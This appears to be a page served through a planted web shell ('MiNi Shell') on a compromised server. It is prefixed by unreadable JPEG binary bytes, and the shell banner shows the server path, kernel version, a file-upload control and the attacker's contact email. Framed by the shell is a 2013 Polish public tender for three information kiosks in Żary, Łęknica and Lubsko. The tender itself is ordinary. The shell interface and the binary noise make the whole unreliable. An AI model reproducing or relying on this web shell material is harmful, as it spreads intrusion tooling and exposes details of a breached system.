JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130718/147201-N-2013.html

<p class="kh_header"><b>Żary: Dostawa i uruchomienie 3 infokiosków w ramach realizowanego projektu pn.  Przygoda z Nysą - zagospodarowanie turystyczne pogranicza polsko-niemieckiego - II etap, dofinansowania ze środków Programu Operacyjnego Współpracy Transgranicznej Polska - Saksonia 2007-2013.</b><br>
<b>Numer ogłoszenia: 147201 - 2013; data zamieszczenia: 18.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Żarski , Al. Jana Pawła II 5, 68-200 Żary, woj. lubuskie, tel. 068 4790600, faks 068 4790601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatzary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i uruchomienie 3 infokiosków w ramach realizowanego projektu pn.  Przygoda z Nysą - zagospodarowanie turystyczne pogranicza polsko-niemieckiego - II etap, dofinansowania ze środków Programu Operacyjnego Współpracy Transgranicznej Polska - Saksonia 2007-2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa i uruchomienie 3 infokiosków w ramach projektu pn.  Przygoda z Nysą-  zagospodarowanie turystyczne pogranicza polsko-niemieckiego - etap II współfinansowanego przez Unię Europejską ze środków  Programu Operacyjnego Współpracy Transgranicznej Polska -  Saksonia 2007- 2013.


2.	Dostawa i uruchomienie 3 infokiosków - 1 wewnętrzny i 2 zewnętrzne (przygotowanie miejsca do zamontowania infokiosków i wszystkie niezbędne przyłącza zapewni Zamawiający), odbędzie się w następujących miejscach według specyfikacji: 

a)	Infokiosk zewnętrzny - usytuowany przy Al. Jana Pawła II 5 w Żarach (przed budynkiem Starostwa Powiatowego). Obudowa wykonana z blachy nierdzewnej szczotkowanej i szkła hartowanego, wyposażona w daszek ( szklany lub z przezroczystego materiału plastycznego), chroniący przed niesprzyjającymi warunkami atmosferycznymi. Ekran dotykowy LCD minimum 19 cali lub nakładka na ekran, zabezpieczony przed aktami wandalizmu. Urządzenie musi być opatrzone wymaganymi logotypami unijnymi oraz logotypem projektu Przygoda z Nysą -  w formie komponującej się z ogólną grafiką urządzenia, zgodnie z załącznikiem do specyfikacji  - instrukcja z logotypami do projektu str. 2. Elementy konstrukcyjne - kolor stalowy, elementy malowane - w kolorze hellblue lub dunkegelb zgodnie z załącznikiem, o którym mowa wyżej. 

 
Gwarancja 24 m-ce. 
Oprogramowanie jednorazowe, obejmujące cenę aktualizacji w okresie gwarancji.
Wykonawca zobowiązany jest do przedstawienia wraz z ofertą wizualizacji  infokiosku, spełniającego powyższe warunki.

b)	Infokiosk zewnętrzny - usytuowany przy ul. Wojska Polskiego 2, 68-208 Łęknica (teren Ośrodka Sportu Kultury i Rekreacji w Łęknicy). Obudowa z blachy malowanej proszkowo, wyposażona w  daszek(szklany lub z przezroczystego materiału plastycznego), chroniący przed niesprzyjającymi warunkami atmosferycznymi. Ekran dotykowy LCD minimum 19 cali lub nakładka na ekran, zabezpieczony przed aktami wandalizmu. Urządzenie musi być opatrzone wymaganymi logotypami unijnymi oraz logotypem projektu Przygoda z Nysą -  w formie komponującej się z ogólną grafiką urządzenia, zgodnie z załącznikiem do specyfikacji  - instrukcja z logotypami do projektu str. 2. Elementy konstrukcyjne - kolor stalowy, elementy malowane - w kolorze hellblue lub dubkegelb, zgodnie z załącznikiem, o którym mowa wyżej. Gwarancja 24 m-ce. Oprogramowanie jednorazowe, obejmujące cenę aktualizacji. Karta WI-FI.
      Wykonawca zobowiązany jest do przedstawienia wraz z ofertą wizualizacji  infokiosku,     
     spełniającego powyższe warunki.

c)	Infokiosk wewnętrzny - usytuowany przy ul. Pokoju 1c, 68-300 Lubsko (filia Starostwa Powiatowego w Żarach). Obudowa z blachy malowanej proszkowo. Ekran dotykowy LCD minimum 19 cali lub nakładka na ekran, zabezpieczony przed aktami wandalizmu. Urządzenie musi być opatrzone wymaganymi logotypami unijnymi oraz logotypem projektu Przygoda z Nysą -  w formie komponującej się z ogólną grafiką urządzenia, zgodnie z załącznikiem do specyfikacji - instrukcja z logotypami do projektu str. 2. Elementy konstrukcyjne - kolor stalowy, elementy malowane - w kolorze hellblue lub dunkeglb, zgodnie z załącznikiem, o którym mowa wyżej.  Gwarancja 24 m-ce. Oprogramowanie jednorazowe, obejmujące cenę aktualizacji.  
      Wykonawca zobowiązany jest do przedstawienia wraz z ofertą wizualizacji  infokiosku,    
      spełniającego powyższe warunki. 

3.	Wymagania techniczne komputera i oprogramowania: 
Komputer:
- Procesor zgodny dla systemu operacyjnego (64 bit)
- Pamięć RAM - Minimum zainstalowane  4 GB (możliwość rozszerzenia do 8 GB)
- Dysk twardy - Minimum 250 GB

- Karta graficzna - Zintegrowana lub obsługa grafiki w procesorze
- 1x RJ45
- 1xVGA
- 1xHDMI (opcjonalnie adapter DVI)

- Temperatura pracy:  10- 35 st. C
- Temperatura spoczynkowa: -40 do 65 st. C
- Wilgotność - 20 do 80 procent (bez kondensacji)
- 64 bit system operacyjny z możliwością pełnej integracji z usługą   ACTIVE DIRECTORY

Panel administracyjny - aplikacja do zdalnego zarządzania oraz monitorowania kioskami oraz dostępnymi na nich usługami. Panel powinien umożliwiać:
- Zdalne restartowanie oraz wyłączanie infomatu 
- Podgląd aktualnego stanu infomatu 
- Podgląd tego, co się dzieje na ekranie 
- Blokowanie dostępu do wybranych kombinacji klawiszy ( ALT-CTRL-DEL, ALT-F4, itd ) 
- Ustawienie automatycznego wyłączania / włączania infomatu o podanej godzinie 
- Konfiguracja głośności dźwięku 

- Definiowanie własnego wygaszacza ekranu 
- Blokowanie dostępu do wybranych programów 
      - Statystyki użytkowania infokiosków ( oprogramowanie, za pomocą którego można wykonać 
        raporty za dany  dzień /konkretny kiosk określając w nim liczbę osób korzystających)
- Monitor sieci infomatów

Moduł do konfiguracji bezpiecznej przeglądarki i systemu:
- Konfiguracja strony startowej oraz wyszukiwarki internetowej 
- Konfiguracja blokowanych adresów oraz możliwość zdefiniowania adresów, które jako jedyne 
  będą odblokowane ( biała lista ) 
- Blokowanie wyskakujących okienek, konfiguracja adresów, na których nie będą one blokowane 
- Możliwość umieszczenia własnego logo na oknie przeglądarki 
- Konfiguracja czasu bez aktywności, po upłynięciu którego, przeglądarka wraca do swojego początkowego stanu, zamykając wszystkie otwarte zakładki 
- Możliwość zdefiniowania dostępnych programów, które mogą zostać uruchomione z poziomu zakładki Programy
Monitor:
- Format ekranu monitora- standardowy,
- Przekątna ekranu - co najmniej 19 cali
- Typ panela LCD - TFT TN
- Kąt widzenia poziomy-170 stopni
- Kąt widzenia pionowy-160 stopni
- Liczba wyświetlanych kolorów- 16,7 mln

4. Inne wymagania: 
Kioski internetowe wolnostojące powinny być mocowane do fundamentu przygotowanego przez Zamawiającego . Konstrukcja wszystkich infokiosków musi zapewnić sztywność i wytrzymałość, gwarantować wandaloodporność, jak również brak możliwości ingerencji osób trzecich do podzespołów wewnętrznych infokiosku..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. wypełniony formularz ofertowy  wg załącznika nr 1 
b. w przypadku Wykonawców występujących wspólnie - pełnomocnictwo 
c. parafowany wzór umowy.
d. wypełniona i podpisana lista podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów (  Dz. U. Nr 50 poz. 331 z póź. zm.), albo informacja o tym, że Wykonawca nie należy  do grupy kapitałowej  wg załącznika nr 4 do SIWZ.
e. oświadczenie wykonawcy o dostarczeniu wraz z przedmiotem zamówienia instrukcji 
    obsługi w języku polskim, oraz atestów i certyfikatów,
      f.  oświadczenie wykonawcy o spełnieniu wymagań technicznych wg załącznika nr 5 do 
    SIWZ.
      g. załączona wizualizacja infokiosków z wymaganymi logotypami.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - wizualizacja infokiosku(wygląd rozwiązania techniczne) - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych przypadkach:
1. Zmiany adresu/siedziby Zamawiającego/Wykonawcy.
2. Zmiana osób występujących po stronie Zamawiającego/Wykonawcy.
3. Zmiany wynagrodzenia związku ze zmianą stawki podatku od towarów i usług (VAT).
4. Zmiany terminu wykonania z uwagi na przedłużającą się procedurę przetargową.

Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo wykonawcy, protokół konieczności, itp.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatzary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Żarach, al. Jana Pawła II 5, pok. nr 210..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Żarach, al. Jana Pawła II 5, pok. nr 210 lub biuro podawcze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane przez Unię Europejską ze środków Programu Operacyjnego Współpracy Zagranicznej Polska-Saksonia 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com